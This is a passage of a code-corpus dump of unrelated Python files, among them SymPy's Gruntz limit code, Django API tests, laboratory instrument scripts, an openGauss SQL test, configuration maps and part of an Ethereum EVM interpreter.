Example (-x)**(-pi)\n # can be written as (-1**(-pi), -pi) which as_coeff_exponent does not return\n if lt[0].has(w):\n base = f.as_base_exp()[0].as_coeff_exponent(w)\n ex = f.as_base_exp()[1]\n lt = (base[0]**ex, base[1]*ex)\n return (lt[0].subs(log(w), logw), lt[1])\n\n\ndef build_expression_tree(Omega, rewrites):\n r\"\"\" Helper function for rewrite.\n\n We need to sort Omega (mrv set) so that we replace an expression before\n we replace any expression in terms of which it has to be rewritten::\n\n e1 ---> e2 ---> e3\n \\\n -> e4\n\n Here we can do e1, e2, e3, e4 or e1, e2, e4, e3.\n To do this we assemble the nodes into a tree, and sort them by height.\n\n This function builds the tree, rewrites then sorts the nodes.\n \"\"\"\n class Node:\n def __init__(self):\n self.before = []\n self.expr = None\n self.var = None\n def ht(self):\n return reduce(lambda x, y: x + y,\n [x.ht() for x in self.before], 1)\n nodes = {}\n for expr, v in Omega:\n n = Node()\n n.var = v\n n.expr = expr\n nodes[v] = n\n for _, v in Omega:\n if v in rewrites:\n n = nodes[v]\n r = rewrites[v]\n for _, v2 in Omega:\n if r.has(v2):\n n.before.append(nodes[v2])\n\n return nodes\n\n\n@debug\n@timeit\ndef rewrite(e, Omega, x, wsym):\n \"\"\"e(x) ... the function\n Omega ... the mrv set\n wsym ... the symbol which is going to be used for w\n\n Returns the rewritten e in terms of w and log(w). See test_rewrite1()\n for examples and correct results.\n \"\"\"\n if not isinstance(Omega, SubsSet):\n raise TypeError(\"Omega should be an instance of SubsSet\")\n if len(Omega) == 0:\n raise ValueError(\"Length cannot be 0\")\n # all items in Omega must be exponentials\n for t in Omega.keys():\n if not isinstance(t, exp):\n raise ValueError(\"Value should be exp\")\n rewrites = Omega.rewrites\n Omega = list(Omega.items())\n\n nodes = build_expression_tree(Omega, rewrites)\n Omega.sort(key=lambda x: nodes[x[1]].ht(), reverse=True)\n\n # make sure we know the sign of each exp() term; after the loop,\n # g is going to be the \"w\" - the simplest one in the mrv set\n for g, _ in Omega:\n sig = sign(g.exp, x)\n if sig != 1 and sig != -1:\n raise NotImplementedError('Result depends on the sign of %s' % sig)\n if sig == 1:\n wsym = 1/wsym # if g goes to oo, substitute 1/w\n # O2 is a list, which results by rewriting each item in Omega using \"w\"\n O2 = []\n denominators = []\n for f, var in Omega:\n c = limitinf(f.exp/g.exp, x)\n if c.is_Rational:\n denominators.append(c.q)\n arg = f.exp\n if var in rewrites:\n if not isinstance(rewrites[var], exp):\n raise ValueError(\"Value should be exp\")\n arg = rewrites[var].args[0]\n O2.append((var, exp((arg - c*g.exp).expand())*wsym**c))\n\n # Remember that Omega contains subexpressions of \"e\". So now we find\n # them in \"e\" and substitute them for our rewriting, stored in O2\n\n # the following powsimp is necessary to automatically combine exponentials,\n # so that the .xreplace() below succeeds:\n # TODO this should not be necessary\n f = powsimp(e, deep=True, combine='exp')\n for a, b in O2:\n f = f.xreplace({a: b})\n\n for _, var in Omega:\n assert not f.has(var)\n\n # finally compute the logarithm of w (logw).\n logw = g.exp\n if sig == 1:\n logw = -logw # log(w)->log(1/w)=-log(w)\n\n # Some parts of SymPy have difficulty computing series expansions with\n # non-integral exponents. 
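    # (For example, exponents with denominators 2 and 3 all become integers after
    # substituting w -> w**6, since lcm(2, 3) = 6; the code below computes that
    # lcm over the rational exponents collected above.)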
The following heuristic improves the situation:\n exponent = reduce(ilcm, denominators, 1)\n f = f.subs({wsym: wsym**exponent})\n logw /= exponent\n\n return f, logw\n\n\ndef gruntz(e, z, z0, dir=\"+\"):\n \"\"\"\n Compute the limit of e(z) at the point z0 using the Gruntz algorithm.\n\n Explanation\n ===========\n\n ``z0`` can be any expression, including oo and -oo.\n\n For ``dir=\"+\"`` (default) it calculates the limit from the right\n (z->z0+) and for ``dir=\"-\"`` the limit from the left (z->z0-). For infinite z0\n (oo or -oo), the dir argument doesn't matter.\n\n This algorithm is fully described in the module docstring in the gruntz.py\n file. It relies heavily on the series expansion. Most frequently, gruntz()\n is only used if the faster limit() function (which uses heuristics) fails.\n \"\"\"\n if not z.is_symbol:\n raise NotImplementedError(\"Second argument must be a Symbol\")\n\n # convert all limits to the limit z->oo; sign of z is handled in limitinf\n r = None\n if z0 == oo:\n e0 = e\n elif z0 == -oo:\n e0 = e.subs(z, -z)\n else:\n if str(dir) == \"-\":\n e0 = e.subs(z, z0 - 1/z)\n elif str(dir) == \"+\":\n e0 = e.subs(z, z0 + 1/z)\n else:\n raise NotImplementedError(\"dir must be '+' or '-'\")\n\n try:\n r = limitinf(e0, z)\n except ValueError:\n r = limitinf(e0, z, leadsimp=True)\n\n # This is a bit of a heuristic for nice results... we always rewrite\n # tractable functions in terms of familiar intractable ones.\n # It might be nicer to rewrite the exactly to what they were initially,\n # but that would take some work to implement.\n return r.rewrite('intractable', deep=True)\n"} {"ext": "py", "sha": "1a2fed1e3ee2c697484cfb881c4f54cc98e55ef3", "content": "from .control_sequence import ControlSequence\nfrom .formatter import format_table\n\n\nclass DocumentClass(ControlSequence):\n def __init__(self, name, descr=''):\n ControlSequence.__init__(self, name, descr)\n # A document class may have options.\n self.has_opts = True\n return\n"} {"ext": "py", "sha": "1a2fed5be55c9adffa50acb62c7dc0bd99897820", "content": "from unicodedata import name\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom django.test import TestCase\n\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom core.models import Ingredient,Recipe\nfrom recipe.serializers import IngredientSerializer\n\nINGREDIENTS_URL = reverse('recipe:ingredient-list')\n\n\nclass PublicIngredientsApiTests(TestCase):\n #Test tha publicly available ingredients API\n\n def setUp(self):\n self.client = APIClient()\n\n def test_login_required(self):\n #Test tha login is required to access the endpoint\n res = self.client.get(INGREDIENTS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\nclass PrivateIngredientsApiTests(TestCase):\n # Test that private ingredient api \n \n def setUp(self) -> None:\n self.client = APIClient()\n self.user = get_user_model().objects.create_user(\n 'test@gmail.com',\n 'pss123'\n )\n self.client.force_authenticate(self.user)\n \n def test_retrive_ingredient_list(self):\n #Test that retrivinng the list of ingredients\n Ingredient.objects.create(user = self.user,name='Kale') \n Ingredient.objects.create(user = self.user,name='Salt') \n\n res = self.client.get(INGREDIENTS_URL)\n\n ingredients = Ingredient.objects.all().order_by('-name')\n serializer = IngredientSerializer(ingredients, many=True)\n self.assertEqual(res.status_code,status.HTTP_200_OK)\n self.assertEqual(res.data,serializer.data)\n \n\n def 
test_ingredients_limits_to_user(self):\n #Test that ingredients for authenticated user and return it\n user2 = get_user_model().objects.create_user(\n 'other@gamil.com'\n 'pass321'\n )\n\n Ingredient.objects.create(user=user2,name='Vinegar')\n ingredient = Ingredient.objects.create(user = self.user,name = 'Tumeric')\n\n res = self.client.get(INGREDIENTS_URL)\n\n self.assertEqual(res.status_code,status.HTTP_200_OK)\n self.assertEqual(len(res.data),1)\n self.assertEqual(res.data[0]['name'], ingredient.name)\n \n def test_create_ingredient_successful(self):\n #Test creating a new ingredient\n payload = {'name':'Cabbage'}\n self.client.post(INGREDIENTS_URL,payload)\n exists = Ingredient.objects.filter(\n user=self.user,\n name=payload['name'] \n ).exists()\n self.assertTrue(exists)\n \n def test_create_ingredient_invalid(self):\n #Test creating a new ingredient with invalid payload\n payload = {'name':''}\n res = self.client.post(INGREDIENTS_URL,payload)\n \n self.assertEqual(res.status_code,status.HTTP_400_BAD_REQUEST)\n \n def test_retrieve_ingredients_assigned_to_recipes(self):\n #Test filtering ingredients by those assigned to recipes\n ingredient1 = Ingredient.objects.create(user=self.user,name='Apples')\n ingredient2 = Ingredient.objects.create(user=self.user,name='Turkey')\n\n recipe = Recipe.objects.create(\n title ='Apple crumble',\n time_minutes=5,\n price=10,\n user = self.user\n )\n recipe.ingredients.add(ingredient1)\n\n res = self.client.get(INGREDIENTS_URL, {'assigned_only':1})\n\n serializer1 = IngredientSerializer(ingredient1)\n serializer2 = IngredientSerializer(ingredient2)\n self.assertIn(serializer1.data, res.data)\n self.assertNotIn(serializer2.data, res.data)\n \n def test_retreive_ingredients_assigned_unique(self):\n #Test filtering ingredients by assigned return unique items\n ingredient = Ingredient.objects.create(user=self.user,name='Eggs')\n Ingredient.objects.create(user=self.user,name='Cheese')\n\n recipe1 = Recipe.objects.create(\n title = 'Eggs benedict',\n time_minutes = 30,\n price = 12.00,\n user=self.user\n )\n recipe1.ingredients.add(ingredient)\n\n recipe2 = Recipe.objects.create(\n title = 'Coriander eggs',\n time_minutes=20,\n price=5.00,\n user=self.user\n )\n recipe2.ingredients.add(ingredient)\n\n res = self.client.get(INGREDIENTS_URL,{'assigned_only':1})\n\n self.assertEqual(len(res.data),1)"} {"ext": "py", "sha": "1a2fee16fc06e4ddbb7103d84074920037c39442", "content": "import time\n\nimport numpy as np\nfrom equipment.custom import mmwave_source\nfrom equipment.hittite import signal_generator\nfrom equipment.srs import lockin\nfrom xystage import stepper\n\n\nfrom kid_readout.interactive import *\nfrom kid_readout.equipment import hardware\nfrom kid_readout.measurement import mmw_source_sweep, core, acquire\n\nlogger.setLevel(logging.DEBUG)\n\n# fg = FunctionGenerator()\n#hittite = signal_generator.Hittite(ipaddr='192.168.0.200')\n#hittite.set_power(0)\n#hittite.on()\nlockin = lockin.Lockin(LOCKIN_SERIAL_PORT)\ntic = time.time()\n# lockin.sensitivity = 17\nprint lockin.identification\nprint lockin.identification\n# print time.time()-tic\n# tic = time.time()\n# print lockin.state(measurement_only=True)\n# print time.time()-tic\nsource = mmwave_source.MMWaveSource()\nsource.set_attenuator_turns(6.0,6.0)\nsource.multiplier_input = 'thermal'\nsource.waveguide_twist_angle = 0\nsource.ttl_modulation_source = 'roach'\n\nhwp_motor = stepper.SimpleStepper(port='/dev/ttyACM2')\n\nsetup = hardware.Hardware(hwp_motor, source, lockin)\n\nri = 
Roach2Baseband()\n\nri.set_modulation_output(7)\n\ninitial_f0s = np.load('/data/readout/resonances/2017-06-JPL-8x8-LF-N1_single_horn_4.npy')/1e6\n\n\nnf = len(initial_f0s)\natonce = 4\nif nf % atonce > 0:\n print \"extending list of resonators to make a multiple of \", atonce\n initial_f0s = np.concatenate((initial_f0s, np.arange(1, 1 + atonce - (nf % atonce)) + initial_f0s.max()))\n\n\nprint len(initial_f0s)\n\nnsamp = 2**20\noffsets = np.arange(-16,16)*512./nsamp\n\nlast_f0s = initial_f0s\n\nmmw_freqs = np.linspace(140e9, 165e9, 128)\n\nri.set_dac_atten(35)\n\n\ntic = time.time()\nf0s = initial_f0s\n#setup.hittite.off()\n\n#high is off for initital\nri.set_modulation_output('high')\n\nncf_source_off = new_nc_file(suffix= 'mmw_broadband_source_off')\n\nprint f0s\n\nswpa = acquire.run_sweep(ri,tone_banks=f0s[None,:]+offsets[:,None],num_tone_samples=nsamp,\n length_seconds=0.2,\n verbose=True, state=setup.state())\n\nprint \"resonance sweep done\", (time.time()-tic)/60.\n\nprint \"sweep written\", (time.time()-tic)/60.\ncurrent_f0s = []\nfor sidx in range(swpa.num_channels):\n swp = swpa.sweep(sidx)\n res = swp.resonator\n print res.f_0, res.Q, res.delay*1e6, res.current_result.redchi, (f0s[sidx]*1e6-res.f_0)\n if np.abs(f0s[sidx]*1e6-res.f_0) > 100e3:\n current_f0s.append(f0s[sidx]*1e6)\n logger.info(\"Resonator index %d moved more than 100 kHz, keeping original value %.1f MHz\" % (sidx,\n f0s[sidx]))\n else:\n current_f0s.append(res.f_0)\nprint \"fits complete\", (time.time()-tic)/60.\ncurrent_f0s = np.array(current_f0s)/1e6\ncurrent_f0s.sort()\nbad_deltas = np.diff(current_f0s) < (256./2**14)*8\nif bad_deltas.sum():\n print \"found bad deltas\", bad_deltas.sum()\n current_f0s[np.nonzero(bad_deltas)] -= 0.1\n bad_deltas = np.diff(current_f0s) < (256./2**14)*8\n if bad_deltas.sum():\n print \"found bad deltas\", bad_deltas.sum()\n current_f0s[np.nonzero(bad_deltas)] -= 0.1\n\nri.set_tone_freqs(current_f0s,nsamp=nsamp)\nri.select_fft_bins(range(len(current_f0s)))\nprint ri.fpga_fft_readout_indexes\nprint np.diff(ri.fpga_fft_readout_indexes.astype('float')).min()\n\nmeas = ri.get_measurement(num_seconds=30)\nmeas.state = setup.state(fast=True)\n\nsweep_stream_array = basic.SweepStreamArray(sweep_array = swpa, stream_array = meas, state = meas.state, description= 'source off')\nncf_source_off.write(sweep_stream_array)\nncf_source_off.close()\n\nturnlist = np.arange(9,-0.1,-0.5)\n\n#turnlist = [9,5,1]\n\nturnlist = [3]\n\n\nfor turn_num in turnlist:\n ri.set_modulation_output(7)\n raw_input('set attenuator knobs to %f turns & check lock-in range' %turn_num)\n source.set_attenuator_turns(turn_num, turn_num)\n #turn on source\n ri.set_modulation_output('low')\n ncf = new_nc_file(suffix='mmw_broadband_source_on_%.2f_turns' %turn_num)\n\n swpa = acquire.run_sweep(ri, tone_banks=f0s[None, :] + offsets[:, None], num_tone_samples=nsamp,\n length_seconds=0.2,\n verbose=True, state=setup.state())\n print \"resonance sweep done\", (time.time() - tic) / 60.\n\n print \"sweep written\", (time.time() - tic) / 60.\n current_f0s = []\n for sidx in range(swpa.num_channels):\n swp = swpa.sweep(sidx)\n res = swp.resonator\n print res.f_0, res.Q, res.delay * 1e6, res.current_result.redchi, (f0s[sidx] * 1e6 - res.f_0)\n if np.abs(f0s[sidx] * 1e6 - res.f_0) > 100e3:\n current_f0s.append(f0s[sidx] * 1e6)\n logger.info(\"Resonator index %d moved more than 100 kHz, keeping original value %.1f MHz\" % (sidx,\n f0s[sidx]))\n else:\n current_f0s.append(res.f_0)\n print \"fits complete\", (time.time() - tic) / 60.\n 
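    # Convert the fitted resonance frequencies back to MHz, sort them, and nudge
    # any tone sitting closer than 8 FFT bins (8 * 256/2**14 MHz) to its neighbour
    # down by 0.1 MHz, presumably so that readout tones stay in separate bins.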
current_f0s = np.array(current_f0s) / 1e6\n current_f0s.sort()\n bad_deltas = np.diff(current_f0s) < (256. / 2 ** 14) * 8\n if bad_deltas.sum():\n print \"found bad deltas\", bad_deltas.sum()\n current_f0s[np.nonzero(bad_deltas)] -= 0.1\n bad_deltas = np.diff(current_f0s) < (256. / 2 ** 14) * 8\n if bad_deltas.sum():\n print \"found bad deltas\", bad_deltas.sum()\n current_f0s[np.nonzero(bad_deltas)] -= 0.1\n\n ri.set_tone_freqs(current_f0s, nsamp=nsamp)\n ri.select_fft_bins(range(len(current_f0s)))\n print ri.fpga_fft_readout_indexes\n print np.diff(ri.fpga_fft_readout_indexes.astype('float')).min()\n\n meas = ri.get_measurement(num_seconds=30)\n #turn on modulation to get zbd voltage\n ri.set_modulation_output(7)\n time.sleep(2)\n\n sweep_stream_array = basic.SweepStreamArray(sweep_array=swpa, stream_array=meas, state=setup.state(fast=True),\n description='source on')\n ncf.write(sweep_stream_array)\n\n meas = ri.get_measurement(num_seconds=30)\n meas.state = setup.state(fast=True)\n\n sweep_stream_array = basic.SweepStreamArray(sweep_array=swpa, stream_array=meas, state=meas.state,\n description='chopped')\n ncf.write(sweep_stream_array)\n\n ncf.close()"} {"ext": "py", "sha": "1a2fef043bb60b57d450dba7201945e2b51ef1aa", "content": "\nimport random\n\nfrom tqdm import tqdm\nimport glob\nimport numpy as np\nimport torch\nfrom sparse_ct.reconstructor_2d.n2self import (\n N2SelfReconstructor)\nfrom sparse_ct.reconstructor_2d.dataset import (\n DeepLesionDataset, EllipsesDataset)\n\n\nif __name__ == \"__main__\":\n\n params= {'batch_size': 8,\n 'shuffle': True,\n 'num_workers': 8}\n N_PROJ = 64\n pwd_train = '/external/CT_30_000/train'\n pwd_test = '/external/CT_30_000/test'\n\n file_list_train = glob.glob(pwd_train+'/*/*/*/*.png')\n file_list_test = glob.glob(pwd_test+'/*/*/*/*.png')\n print(\"file_list_train\", len(file_list_train))\n print(\"file_list_test\", len(file_list_test))\n\n # train_loader = torch.utils.data.DataLoader(\n # DeepLesionDataset(\n # file_list_train, \n # return_gt=False,\n # n_proj=N_PROJ,\n # img_size=512),\n # **params\n # )\n\n # test_loader = torch.utils.data.DataLoader(\n # DeepLesionDataset(\n # random.choices(file_list_test, k=1000), \n # return_gt=True,\n # n_proj=N_PROJ,\n # img_size=512),\n # **params\n # )\n\n train_loader = torch.utils.data.DataLoader(\n EllipsesDataset(\n ellipses_type='train', \n return_gt=False,\n n_proj=N_PROJ,\n img_size=512),\n **params\n )\n\n test_loader = torch.utils.data.DataLoader(\n EllipsesDataset(\n ellipses_type='validation',\n return_gt=True,\n n_proj=N_PROJ,\n img_size=512),\n **params\n )\n\n theta = np.linspace(0.0, 180.0, N_PROJ, endpoint=False)\n recon_n2self = N2SelfReconstructor(\n 'N2SelfTrained',\n net='unet', lr=0.0001,\n n2self_weights=None,#'selfsuper-ellipses-64-l1-train1/iter_180000.pth',#'iter_15000.pth',\n #'selfsuper-ellipses-64-train8/iter_58800.pth', #'self-super-train9/iter_199800.pth',\n learnable_filter=False\n )\n recon_n2self.init_train(theta)\n recon_n2self._eval(test_loader)\n\n for i in range(50):\n print('--------------- ',i)\n recon_n2self._train_one_epoch(train_loader, test_loader)\n recon_n2self._eval(test_loader)\n recon_n2self._save('epoch_{}.pth'.format(i))\n recon_n2self._save('end.pth')\n"} {"ext": "py", "sha": "1a2feff3c24738113364bd8043fa2206d4733889", "content": "# Generated by Django 4.0.1 on 2022-02-08 00:49\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('items', '0001_initial'),\n ]\n\n operations = [\n 
migrations.AddField(\n model_name='item',\n name='ocultar',\n field=models.BooleanField(default=True),\n ),\n ]\n"} {"ext": "py", "sha": "1a2ff1878fb5b2ace84def751fd6818c96ee7e46", "content": "# Hash Table; Bit Manipulation\n\n# Given two strings s and t which consist of only lowercase letters.\n#\n# String t is generated by random shuffling string s and then add one more letter at a random position.\n#\n# Find the letter that was added in t.\n#\n# Example:\n#\n# Input:\n# s = \"abcd\"\n# t = \"abcde\"\n#\n# Output:\n# e\n#\n# Explanation:\n# 'e' is the letter that was added.\nclass Solution(object):\n def findTheDifference(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: str\n \"\"\"\n sMap = collections.Counter(s)\n tMap = collections.Counter(t)\n for x in tMap:\n if x not in sMap or tMap[x] != sMap[x]:\n return x\n return None\n"} {"ext": "py", "sha": "1a2ff1b61ed8184e6edaf2a24430eb7123687cc3", "content": "\"\"\"\nCopyright (c) 2022 Huawei Technologies Co.,Ltd.\n\nopenGauss is licensed under Mulan PSL v2.\nYou can use this software according to the terms and conditions of the Mulan PSL v2.\nYou may obtain a copy of Mulan PSL v2 at:\n\n http://license.coscl.org.cn/MulanPSL2\n\nTHIS SOFTWARE IS PROVIDED ON AN \"AS IS\" BASIS, WITHOUT WARRANTIES OF ANY KIND,\nEITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,\nMERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.\nSee the Mulan PSL v2 for more details.\n\"\"\"\n\"\"\"\nCase Type : 功能测试\nCase Name : overlay函数入参为中文字符\nDescription : \n 1.使用overlay函数对中文字符进行处理\nExpect : \n 1.返回结果正确\nHistory : \n\"\"\"\n\nimport unittest\nimport sys\nfrom yat.test import Node\nfrom yat.test import macro\n\nsys.path.append(sys.path[0] + \"/../\")\nfrom testcase.utils.Logger import Logger\nfrom testcase.utils.CommonSH import CommonSH\n\nlogger = Logger()\n\n\nclass Function(unittest.TestCase):\n\n def setUp(self):\n logger.info(\"--------Opengauss_Function_Innerfunc_Overlay_Case0004.py开始执行--------\")\n self.commonsh = CommonSH('dbuser')\n self.userNode = Node('dbuser')\n self.DB_ENV_PATH = macro.DB_ENV_PATH\n\n def test_right(self):\n encoding = ['SQL_ASCII', 'UTF-8']\n sql_cmd = \"SELECT overlay('和卡拉和梵蒂冈' placing '猕猴桃666' from 4 for 9 );\"\n result = [\"和猕猴桃666梵蒂冈\", \"和卡拉猕猴桃666\"]\n\n for i in range(2):\n # 创建数据库\n db_create = f\"\"\"drop database if exists aaa;\n create database aaa encoding = '{encoding[i]}';\"\"\"\n msg1 = self.commonsh.execut_db_sql(db_create)\n logger.info(msg1)\n self.assertTrue('CREATE' in msg1)\n # 连接新建的编码类型的库执行sql语句\n cmd1 = f'''source {self.DB_ENV_PATH};\n gsql -d aaa -p {self.userNode.db_port} -c \"{sql_cmd}\"'''\n msg2 = self.userNode.sh(cmd1).result()\n logger.info(msg2)\n self.assertTrue(msg2.splitlines()[-2].strip() == result[i])\n # 删除数据库\n db_drop = f'''drop database aaa;'''\n msg3 = self.commonsh.execut_db_sql(db_drop)\n logger.info(msg3)\n self.assertTrue('DROP' in msg3)\n\n def tearDown(self):\n logger.info('--------Opengauss_Function_Innerfunc_Overlay_Case0004.py执行结束--------')"} {"ext": "py", "sha": "1a2ff2cf5841c7d94e23405e4f6c9a7b0ee641e6", "content": "# generated from catkin/cmake/template/pkg.context.pc.in\nCATKIN_PACKAGE_PREFIX = \"\"\nPROJECT_PKG_CONFIG_INCLUDE_DIRS = \"\".split(';') if \"\" != \"\" else []\nPROJECT_CATKIN_DEPENDS = \"gazebo_ros\".replace(';', ' ')\nPKG_CONFIG_LIBRARIES_WITH_PREFIX = \"\".split(';') if \"\" != \"\" else []\nPROJECT_NAME = \"turtlebot3_description_reduced_mesh\"\nPROJECT_SPACE_DIR = 
\"/home/ubuntu/environment/HelloWorld/simulation_ws/build/turtlebot3_description_reduced_mesh/devel\"\nPROJECT_VERSION = \"1.1.0\"\n"} {"ext": "py", "sha": "1a2ff3a4303be91e30df11d584e36598bd4917c2", "content": "GeometryConf={\n 'DBExtended' : 'DB:Extended',\n 'DBExtendedGFlash' : 'DB:ExtendedGFlash',\n 'DBExtendedLiMax' : 'DB:ExtendedLiMax',\n 'DBExtendedLiMin' : 'DB:ExtendedLiMin',\n 'DBExtendedX0Max' : 'DB:ExtendedX0Max',\n 'DBExtendedX0Min' : 'DB:ExtendedX0Min',\n 'DBExtended2015' : 'DB:Extended',\n 'DBExtended2017' : 'DB:Extended',\n 'DBExtended2017ZeroMaterial' : 'DB:Extended2017ZeroMaterial',\n 'DBExtended2018' : 'DB:Extended',\n 'DBExtended2021' : 'DB:Extended',\n 'DBExtended2026' : 'DB:Extended2026',\n 'DBIdeal2015' : 'DB:Ideal2015',\n 'DBIdeal2015dev' : 'DB:Ideal2015dev',\n 'Ideal2015' : 'Ideal2015,Ideal2015Reco',\n 'Ideal2015dev' : 'Ideal2015dev,Ideal2015devReco',\n 'Extended' : 'Extended,ExtendedReco',\n 'Extended2015' : 'Extended2015,Extended2015Reco',\n 'Extended2015dev': 'Extended2015dev,Extended2015devReco',\n 'Extended2016' : 'Extended2016,Extended2016Reco',\n 'Extended2017' : 'Extended2017,Extended2017Reco',\n 'Extended2018' : 'Extended2018,Extended2018Reco',\n 'Extended2017Plan1' : 'Extended2017Plan1,Extended2017Plan1Reco',\n 'Extended2017Plan1ZeroMaterial' : 'Extended2017Plan1ZeroMaterial,Extended2017Plan1ZeroMaterialReco',\n 'Extended2021' : 'Extended2021,Extended2021Reco',\n 'All' : 'Configuration.Geometry.GeometrySimAll_cff,Reco',\n 'ECALHCAL' : 'Configuration.Geometry.GeometrySimECALHCAL_cff,Configuration.Geometry.GeometryRecoECALHCAL_cff',\n 'TrackerOnly' : 'Configuration.Geometry.GeometrySimTracker_cff,Configuration.Geometry.GeometryRecoTracker_cff',\n 'HCal' : 'Configuration.Geometry.GeometrySimHCAL_cff,Configuration.Geometry.GeometryRecoHCAL_cff',\n 'Extended2026D35' : 'Extended2026D35,Extended2026D35Reco',\n 'Extended2026D41' : 'Extended2026D41,Extended2026D41Reco',\n 'Extended2026D43' : 'Extended2026D43,Extended2026D43Reco',\n 'Extended2026D44' : 'Extended2026D44,Extended2026D44Reco',\n 'Extended2026D45' : 'Extended2026D45,Extended2026D45Reco',\n 'Extended2026D46' : 'Extended2026D46,Extended2026D46Reco',\n 'Extended2026D47' : 'Extended2026D47,Extended2026D47Reco',\n }\n"} {"ext": "py", "sha": "1a2ff41ce31e65dadf81b74360bf9e1cdebdf445", "content": "\"\"\"\nEthereum Virtual Machine (EVM) Interpreter\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n.. contents:: Table of Contents\n :backlinks: none\n :local:\n\nIntroduction\n------------\n\nA straightforward interpreter that executes EVM code.\n\"\"\"\nfrom dataclasses import dataclass\nfrom typing import Iterable, Set, Tuple, Union\n\nfrom ethereum.base_types import U256, Bytes0, Uint\nfrom ethereum.utils.ensure import EnsureError, ensure\n\nfrom ..eth_types import Address, Log\nfrom ..state import (\n account_has_code_or_nonce,\n begin_transaction,\n commit_transaction,\n get_account,\n increment_nonce,\n move_ether,\n rollback_transaction,\n set_code,\n touch_account,\n)\nfrom ..utils.address import to_address\nfrom ..vm import Message\nfrom ..vm.error import (\n InsufficientFunds,\n InvalidJumpDestError,\n InvalidOpcode,\n OutOfGasError,\n StackDepthLimitError,\n StackOverflowError,\n StackUnderflowError,\n)\nfrom ..vm.gas import GAS_CODE_DEPOSIT, REFUND_SELF_DESTRUCT, subtract_gas\nfrom ..vm.precompiled_contracts.mapping import PRE_COMPILED_CONTRACTS\nfrom . 
import Environment, Evm\nfrom .instructions import Ops, op_implementation\nfrom .runtime import get_valid_jump_destinations\n\nSTACK_DEPTH_LIMIT = U256(1024)\nMAX_CODE_SIZE = 0x6000\nRIPEMD160_ADDRESS = to_address(Uint(3))\n\n\n@dataclass\nclass MessageCallOutput:\n \"\"\"\n Output of a particular message call\n\n Contains the following:\n\n 1. `gas_left`: remaining gas after execution.\n 2. `refund_counter`: gas to refund after execution.\n 3. `logs`: list of `Log` generated during execution.\n 4. `accounts_to_delete`: Contracts which have self-destructed.\n 5. `touched_accounts`: Accounts that have been touched.\n 6. `has_erred`: True if execution has caused an error.\n \"\"\"\n\n gas_left: U256\n refund_counter: U256\n logs: Union[Tuple[()], Tuple[Log, ...]]\n accounts_to_delete: Set[Address]\n touched_accounts: Iterable[Address]\n has_erred: bool\n\n\ndef process_message_call(\n message: Message, env: Environment\n) -> MessageCallOutput:\n \"\"\"\n If `message.current` is empty then it creates a smart contract\n else it executes a call from the `message.caller` to the `message.target`.\n\n Parameters\n ----------\n message :\n Transaction specific items.\n\n env :\n External items required for EVM execution.\n\n Returns\n -------\n output : `MessageCallOutput`\n Output of the message call\n \"\"\"\n if message.target == Bytes0(b\"\"):\n is_collision = account_has_code_or_nonce(\n env.state, message.current_target\n )\n if is_collision:\n return MessageCallOutput(\n U256(0), U256(0), tuple(), set(), set(), True\n )\n else:\n evm = process_create_message(message, env)\n else:\n evm = process_message(message, env)\n\n accounts_to_delete = collect_accounts_to_delete(evm, set())\n evm.refund_counter += len(accounts_to_delete) * REFUND_SELF_DESTRUCT\n\n return MessageCallOutput(\n gas_left=evm.gas_left,\n refund_counter=evm.refund_counter,\n logs=evm.logs,\n accounts_to_delete=accounts_to_delete,\n touched_accounts=collect_touched_accounts(evm),\n has_erred=evm.has_erred,\n )\n\n\ndef process_create_message(message: Message, env: Environment) -> Evm:\n \"\"\"\n Executes a call to create a smart contract.\n\n Parameters\n ----------\n message :\n Transaction specific items.\n env :\n External items required for EVM execution.\n\n Returns\n -------\n evm: :py:class:`~ethereum.spurious_dragon.vm.Evm`\n Items containing execution specific objects.\n \"\"\"\n # take snapshot of state before processing the message\n begin_transaction(env.state)\n\n increment_nonce(env.state, message.current_target)\n evm = process_message(message, env)\n if not evm.has_erred:\n contract_code = evm.output\n contract_code_gas = len(contract_code) * GAS_CODE_DEPOSIT\n try:\n evm.gas_left = subtract_gas(evm.gas_left, contract_code_gas)\n ensure(len(contract_code) <= MAX_CODE_SIZE, OutOfGasError)\n except OutOfGasError:\n rollback_transaction(env.state)\n evm.gas_left = U256(0)\n evm.logs = ()\n evm.accounts_to_delete = dict()\n evm.refund_counter = U256(0)\n evm.has_erred = True\n else:\n set_code(env.state, message.current_target, contract_code)\n commit_transaction(env.state)\n else:\n rollback_transaction(env.state)\n return evm\n\n\ndef process_message(message: Message, env: Environment) -> Evm:\n \"\"\"\n Executes a call to create a smart contract.\n\n Parameters\n ----------\n message :\n Transaction specific items.\n env :\n External items required for EVM execution.\n\n Returns\n -------\n evm: :py:class:`~ethereum.spurious_dragon.vm.Evm`\n Items containing execution specific objects\n \"\"\"\n if 
message.depth > STACK_DEPTH_LIMIT:\n raise StackDepthLimitError(\"Stack depth limit reached\")\n\n # take snapshot of state before processing the message\n begin_transaction(env.state)\n\n touch_account(env.state, message.current_target)\n\n sender_balance = get_account(env.state, message.caller).balance\n\n if message.should_transfer_value and message.value != 0:\n if sender_balance < message.value:\n rollback_transaction(env.state)\n raise InsufficientFunds(\n f\"Insufficient funds: {sender_balance} < {message.value}\"\n )\n move_ether(\n env.state, message.caller, message.current_target, message.value\n )\n\n evm = execute_code(message, env)\n if evm.has_erred:\n # revert state to the last saved checkpoint\n # since the message call resulted in an error\n rollback_transaction(env.state)\n else:\n commit_transaction(env.state)\n return evm\n\n\ndef execute_code(message: Message, env: Environment) -> Evm:\n \"\"\"\n Executes bytecode present in the `message`.\n\n Parameters\n ----------\n message :\n Transaction specific items.\n env :\n External items required for EVM execution.\n\n Returns\n -------\n evm: `ethereum.vm.EVM`\n Items containing execution specific objects\n \"\"\"\n code = message.code\n valid_jump_destinations = get_valid_jump_destinations(code)\n evm = Evm(\n pc=Uint(0),\n stack=[],\n memory=bytearray(),\n code=code,\n gas_left=message.gas,\n env=env,\n valid_jump_destinations=valid_jump_destinations,\n logs=(),\n refund_counter=U256(0),\n running=True,\n message=message,\n output=b\"\",\n 